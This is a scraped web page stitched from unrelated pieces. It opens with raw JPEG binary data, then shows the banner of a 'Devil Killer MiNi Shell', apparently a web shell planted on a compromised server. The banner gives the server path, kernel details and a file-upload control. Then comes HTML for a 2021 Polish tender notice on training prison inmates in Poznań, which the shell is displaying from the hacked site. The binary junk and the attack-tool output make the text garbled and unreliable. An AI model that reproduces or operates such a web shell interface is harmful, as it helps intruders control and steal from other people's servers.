JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210517/0005655101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00056551 z dnia 2021-05-17</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> świadczenie usługi szkoleniowej w zakresie zorganizowania i przeprowadzenia szkoleń dla osób osadzonych w zakładach karnych i aresztach śledczych podległych OISW w Poznaniu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OKRĘGOWY INSPEKTORAT SŁUŻBY WIĘZIENNEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 630750549</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Młyńska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-729</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">618568259</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">618568253</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oisw_poznan@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/oisw_poznan</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> świadczenie usługi szkoleniowej w zakresie zorganizowania i przeprowadzenia szkoleń dla osób osadzonych w zakładach karnych i aresztach śledczych podległych OISW w Poznaniu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-550d18ba-b4af-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00056551</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013283/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">2.3.1 Świadczenie usługi szkoleniowej w zakresie zorganizowania i przeprowadzenia szkoleń dla osób osadzonych wzakładach karnych i aresztach śledczych podległych OISW w Poznaniu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 5) ustawy</p> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ,,Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności” w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/oisw_poznan/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/oisw_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń,wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwemplatformy zakupowej pod adresem: https://platformazakupowa.pl/pn/oisw_poznan i formularza „Wyślijwiadomość” dostępnego na stronie dotyczącej postępowania. 2. Dokumenty elektroniczne,oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń przekazuje się w postacielektronicznej i opatruje się kwalifikowanym podpisem elektronicznym. Wykonawca jest zobowiązanyprzekazać dokumenty za pośrednictwem platformy zakupowej pod adresem:https://platformazakupowa.pl/pn/oisw_poznan.3. W przypadku przekazywania w postępowaniudokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającegoskompresowany dokument kwalifikowanym podpisem elektronicznym, jest równoznaczne zopatrzeniem wszystkich dokumentów zawartych w tym pliku kwalifikowanym podpisemelektronicznym.4. W korespondencji kierowanej do zamawiającego wykonawcy powinni posługiwać sięnumerem przedmiotowego postępowania.5. Podpisy kwalifikowane wykorzystywane przezwykonawców do podpisywania wszelkich plików muszą spełniać “Rozporządzenie ParlamentuEuropejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcjielektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.6. Wprzypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączeniaodpowiedniej ilości plików, podpisywanych plików z danymi oraz plików XAdES.7. Zgodnie z definicjądokumentu elektronicznego z art.3 ustęp 2 Ustawy o informatyzacji działalności podmiotówrealizujących zadania publiczne, opatrzenie pliku zawierającego skompresowane dane kwalifikowanympodpisem elektronicznym jest jednoznaczne z podpisaniem oryginału dokumentu, z wyjątkiem kopiipoświadczonych odpowiednio przez innego wykonawcę ubiegającego się wspólnie z nim o udzieleniezamówienia, przez podmiot, na którego zdolnościach lub sytuacji polega wykonawca, albo przezpodwykonawcę.8. Wymagania techniczne:8.1. Minimalne wymagania techniczne umożliwiającekorzystanie ze Strony platformazakupowa.pl to przeglądarka internetowa Internet Explorer (wersji min.10) , Chrome i FireFox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript,akceptująca pliki typu „cookies” oraz łącze internetowe o przepustowości, co najmniej 512 kbit/s.platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768pikseli.8.2.Oferta lub wniosek powinny być sporządzone w języku polskim, z zachowaniem postacielektronicznej, a do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub multimedialnestosuj się:.txt; .rtf; .pdf; .xps; .odt; .ods; .odp; .doc; .xls; .ppt; .docx; .xlsx; .pptx; .csv. Zamawiającydopuszcza formaty.zip i 7z, które mogą zawierać jedynie pliki o wyżej wymienionych formatach.Zamawiający zaleca stosowanie formatu pdf.9. Maksymalny rozmiar jednego pliku przesyłanego zapośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MBnatomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.10. W celu sprawnegoprzeprowadzenia otwarcia ofert Zamawiający wymaga, aby nazwy plików jednoznacznie określały, wktórym z nich znajduje się formularz oferty</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zał. 11 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OI/POWER.2230.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 539712,80 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi szkoleniowej w zakresie zorganizowania iprzeprowadzenia szkoleń dla osób osadzonych w zakładach karnych i aresztach śledczychpodległych OISW w Poznaniu w ramach projektu ,,Podniesienie kwalifikacji zawodowychwięźniów w celu ich powrotu na rynek pracy po zakończeniu odbywania kary pozbawieniawolności” w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020,finansowanego ze środków Funduszy Europejskich. Zamówienie obejmuje łącznie szkolenie dla 20 grup po maksymalnie 11 osób co łącznie stanowi maksymalnie 220 osób. Szczegółowy opisprzedmiotu zamówienia znajduje się w Załączniku nr 3 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80562000-1 - Usługi szkolenia w dziedzinie pierwszej pomocy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-09-24</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty na podstawiekryteriów oceny ofert określonych w pkt. 17.1.4. SWZ.Zamawiający może najpierw dokonać badania ioceny ofert, a następnie dokonać kwalifikacji podmiotowej Wykonawcy, którego oferta została najwyżejoceniona, w zakresie braku podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu.Ocena ofert, której poddawani są wszyscy Wykonawcy zostanie dokonana w oparciu o informacjezawarte w ofercie wg. kryteriów określonych w SWZ. Ocena kwalifikacji podmiotowej Wykonawcy,którego oferta została najwyżej oceniona, w zakresie braku podstaw wykluczenia oraz spełnianiawarunków udziału w postępowaniu zostanie dokonana w oparciu o informacje zawarte na podstawieinformacji zawartych w przedłożonych dokumentach i oświadczeniach wg. formuły spełnia/nie spełnia.W przeprowadzonym postępowaniu przetargowym zostanie wybrana oferta, która według formułyoceny ofert uzyska największą ilość punktów oraz spełni wszystkie wymagania SWZ. Ocena zostaniedokonana na podstawie wypełnionego formularza ofertowego. Realizacja zamówienia zostaniepowierzona wykonawcy, który uzyska najwyższą ilość punktów i po spełnienia wszystkich warunkówokreślonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">: termin przeprowadzenia każdego szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">koszt materiałów oraz drobnych narzędzi przeznaczonych do części praktycznej w każdym szkoleniu ogólnej wartości brutto realizowanego kursu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wymagania społeczne:O udzielenie zamówienia mogą się ubiegać wyłącznie wykonawcymający status zakładu pracy chronionej, spółdzielnie socjalne oraz inni wykonawcy, którychgłównym celem działalności lub głównym celem działalności ich wyodrębnionych organizacyjniejednostek, które będą realizowały zamówienie jest społeczna i zawodowa integracja osóbspołecznie marginalizowanych - osób pozbawionych wolności lub zwalnianych z zakładówkarnych, o których mowa w ustawie z dnia 6 czerwca 1997 r. – Kodeks karny wykonawczy (Dz.U. z 2019.poz.676,679 i 1694), mających trudności w integracji ze środowiskiem, podwarunkiem, że procentowy wskaźnik zatrudnienia osób należących do kategorii, o której mowa wart.94 ust. 1 pkt 5 ustawy Pzp jest nie mniejszy niż 30% osób zatrudnionych u wykonawcy albow jego jednostce, która będzie realizować zamówienie.Zdolności do występowania w obrociegospodarczym:Zamawiający wymaga, aby wykonawca prowadzący działalność gospodarczą lubzawodową był wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych wkraju, w którym ma siedzibę lub miejsce zamieszkania wystawionego nie wcześniej niż 6miesięcy przed jego złożeniem.Wykonawca spełni warunek, jeżeli wykaże, że posiadaodpowiednie zezwolenie, licencję, koncesję lub wpis do rejestru działalności regulowanej, jeżelijej posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym wykonawcama siedzibę lub miejsce zamieszkania.Uprawnienia do wykonywania określonej działalnościgospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:Zamawiający wymaga, abywykonawca posiadał odpowiednie zezwolenie, licencję, koncesję lub wpis do rejestrudziałalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usługw kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.Wykonawca spełniwarunek, jeśli wykaże, że jest podmiotem uprawnionym do prowadzenia kształcenia kursowego,zgodnie z wymaganiami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 19marca 2019 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2019poz. 652);Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczejlub zawodowej, o której mowa w art. 112 ust. 2 pkt 2 ustawy Pzp zostanie spełniony, jeżeli conajmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadauprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizujeusługi, do których realizacji te uprawnienia są wymagane.Sytuacja ekonomiczna lubfinansowa:Wykonawca spełni warunek, jeżeli wykaże, że posiada ubezpieczenieodpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotemzamówienia na kwotę równą co najmniej 100 000,00 zł (słownie: sto tysięcy złotych).Zdolnośćtechniczna lub zawodowa:Zamawiający wymaga, aby wykonawca wykazał się wykonaniem wokresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzeniadziałalności jest krótszy - w tym okresie, że należycie wykonał (przeprowadził) co najmniej: 20szkoleń zawodowych osób dorosłych w formach pozaszkolnych dla nie mniej niż łącznie 220osób.Za 1 szkolenie zawodowe osób dorosłych w formach pozaszkolnych rozumie się realizacjęusługi (kursu) w ramach jednej grupy szkoleniowej na podstawie umowy wykonanej, zgodnie zRozporządzeniem Ministra Edukacji Narodowej z dnia 19 marca 2019 r. w sprawie kształceniaustawicznego w formach pozaszkolnych (Dz. U. z 2019 r. poz. 652,). Jeżeli umowa dotyczyłaprzeszkolenia większej liczby grup kursantów za liczbę szkoleń zawodowych należy przyjąćliczbę przeszkolonych grup. Do wykazu zrealizowanych usług szkoleniowych (załącznik nr 9 doSWZ) należy dołączyć dowody określające czy te usługi zostały wykonane lub są wykonywanenależycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumentywystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeńokresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnymcharakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy;w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź innedokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału wpostępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz dokumentów wymaganych od wykonawcy, którego oferta zostanie oceniona najwyżej:1.Oświadczenia, o którym mowa w art. 125 ust. 1 ustawy w formie formularza jednolitego europejskiegodokumentu zamówienia, sporządzonym zgodnie ze wzorem standardowego formularza określonego wrozporządzeniu wykonawczym Komisji (UE) 2016/7 z dnia 5 stycznia 2016 r. ustanawiającymstandardowy formularz jednolitego europejskiego dokumentu zamówienia (Dz. Urz. UE L 3 z06.01.2016, str. 16), zwanego jednolitym dokumentem,2. Informację z Krajowego Rejestru Karnego wzakresie dotyczącym podstaw wykluczenia wskazanych w art. 108 ust. 1 pkt 1 i 2 Ustawy Pzp,sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem;3. Oświadczenie Wykonawcy, wzakresie wskazanym w art. 108 ust. 1 pkt 5 Ustawy Pzp, o braku przynależności do tej samej grupykapitałowej (w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekstjednolity Dz. U. z 2020 r., poz. 1076 z późn.zm.), albo oświadczenie o przynależności do tej samejgrupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie ofertyniezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.4. Zaświadczeniawłaściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniempodatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy , wystawionego nie wcześniej niż 3 miesiąceprzed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz zzaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przedupływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływemterminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkamilub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.5. Zaświadczeniaalbo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy RolniczegoUbezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek naubezpieczenia społeczne lub zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy , wystawionego niewcześniej niż 3 miesiące przed jego złożeniem lub złożenia dokumentów potwierdzających, żeodpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniualbo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek naubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążąceporozumienie w sprawie spłat tych należności.6. Aktualny odpis lub informacja z Krajowego RejestruSądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust.1 pkt 4 Ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębneprzepisy wymagają wpisu do rejestru lub ewidencji7. Oświadczenie o aktualności informacji zawartychw oświadczeniu JEDZ, w zakresie podstaw wykluczenia z postępowania, o których mowa w: art. 108ust. 1 pkt 3 ,4 i 6 Ustawy Pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dokumentów wymaganych wraz z ofertą:1. Oświadczeniapotwierdzającego status wykonawcy jako zakładu pracy chronionej lub potwierdzających prowadzenie przez wykonawcę lub przez jego wyodrębnioną organizacyjnie jedn0stkę, która będzie realizowałazamówienie, działalności, której głównym celem jest społeczna i zawodowa integracja osób społeczniemarginalizowanych – ust.2.1. Załącznika nr 5 do SWZ,2. Oświadczenia potwierdzającego procentowywskaźnik zatrudnienia osób pozbawionych wolności lub zwalnianych z zakładów karnych, o którychmowa w ustawie z dnia 6 czerwca 1997 r. – Kodeks karny wykonawczy (Dz. U. z 2019 r. poz. 676, 679 i1694), mających trudności w integracji ze środowiskiem – ust. 2.2 Załącznika nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga, w zakresie zdolności do występowania w obrocie gospodarczym, 